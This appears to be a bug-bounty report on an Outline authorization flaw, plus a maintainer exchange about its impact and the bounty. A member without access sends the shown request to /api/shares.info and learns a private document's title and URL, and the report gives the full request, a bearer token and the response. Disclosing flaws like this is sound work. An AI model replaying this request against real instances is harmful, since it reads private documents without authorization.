unprivileged user can get document details in outline/outline
Reported on
Jul 1st 2022
Description
unprivileged user can see document details of any document .
Proof of Concept
1. From admin account add a new user called user-B as member role .
2. Now from admin account create a private collection and dont share it with any member .Set bellow permisiion for this collection
Default Access --> No access
3. Now from admin account add new document to this collection . So, user-B should not see this document details .
Lets assume documentId is 1ad60950-9e50-4316-8cd9-6f4ff49d7f31 of this document .
4. Now from user-B account sent bellow request to get details of this document
POST /api/shares.info HTTP/1.1
Host: myacc.getoutline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 68
X-Editor-Version: 12.0.0
Origin: https://myacc.getoutline.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImMzYTRjNzdhLWY4YjctNDJkMy05MjZhLTQzNWY3OTQ5ZDkwZSIsInR5cGUiOiJzZXNzaW9uIiwiaWF0IjoxNjU2Njg0Njg1fQ.UmVUcAfPXqhWuGI_i8qZemBwDpN5nZN6tovq_sMPnIA
Te: trailers
Connection: close
ACCOUNT: TEST2
.
{"documentId":"1ad60950-9e50-4316-8cd9-6f4ff49d7f31","apiVersion":4}
here change documentId with above documentId .
You can give documentId of any private collection document of any users .
response
{
"data": {
"id": "ec76aaf3-815d-4db8-a177-c5b4e124172c",
"documentId": "1ad60950-9e50-4316-8cd9-6f4ff49d7f31",
"documentTitle": "dcco2",
"documentUrl": "/doc/dcco2-MphGaOA1Ls",
"published": false,
"url": "https://myacc.getoutline.com/share/ec76aaf3-815d-4db8-a177-c5b4e124172c",
"createdBy": {
"id": "09da9275-6dbc-48cd-9026-a3dc255c441c",
"name": "myname",
"avatarUrl": "https://outline-production-attachments.s3-accelerate.amazonaws.com/avatars/09da9275-6dbc-48cd-9026-a3dc255c441c/86867337-db3f-4713-97aa-505fa51be224",
"color": "#9E5CF7",
"isAdmin": true,
"isSuspended": false,
"isViewer": false,
"createdAt": "2022-07-01T13:34:59.700Z",
"updatedAt": "2022-07-01T19:40:32.477Z",
"lastActiveAt": "2022-07-01T19:40:32.477Z"
},
"includeChildDocuments": false,
"createdAt": "2022-07-01T16:39:48.101Z",
"updatedAt": "2022-07-01T19:43:44.866Z"
},
"policies": [
{
"id": "ec76aaf3-815d-4db8-a177-c5b4e124172c",
"abilities": {
"read": true,
"update": true,
"revoke": false
}
}
],
"status": 200,
"ok": true
}
Impact
unprivileged user can get details of any document of any users using documentId.
So, the reproduction steps are:
- The attacker must be on the same team
- The document or one of it's parents must have a Share record in the database
- The attacker must guess or otherwise obtain a UUID
The data that's leaked is just the document name and url path. The user information doesn't really count because you're already on the same team and can access that irregardless.
Does that sound right?
The attacker must be on the same team
yes
\
The document or one of it's parents must have a Share record in the database
yes
But this document is private . This document is created under a private collection by admin and collection has no other user/group assigned to it . Only admin has permission in this collection and Default Acces --> No Access for this collection .
\
The attacker must guess or otherwise obtain a UUID
id guess is not possible beacause it is long hash value .
There is two way that attacker can get UUID
1. Previously admin assign/share attacker to this document . Now attacker has permission and during this time attacker write-down the documentId . After that admin revoked access of attacker from this document .
So, attacker does not have permission to access this document but attacker already has the DocumentId .
2. documentId is leaked and attacker got that documentId .
\
The data that's leaked is just the document name and url path. The user information doesn't really count because you're already on the same team and can access that irregardless
yes , data leaked are Document title and url .
If admin modified the document title and then using this bug attacker can get document Title or url .
Okay, so TLDR:
If you've had access to a document before and held onto the ID then once you no longer have access you can use the API directly to find out any changes to the title.
It's a good find and definitely a bug in the logic here, but the real-life impact is pretty much negligible.
@maintainer so this report does not qualify for bounty reward?
I don't know how the bounty amount works, I marked it as valid
@maintainer
If you directly mark the report as Low or None then it does not reward bounty.
But if you mark the report as Low by calculating CVSS score then it gives bounty.
Let me know if this report should deserve a bounty or not.
@maintainer
Bounty are assigned according to report severity and paid by huntr team .
Here is the bounty table \
High--->$900 Medium-->$300 Low--->$100
@maintainer so this report does not qualify for bounty reward?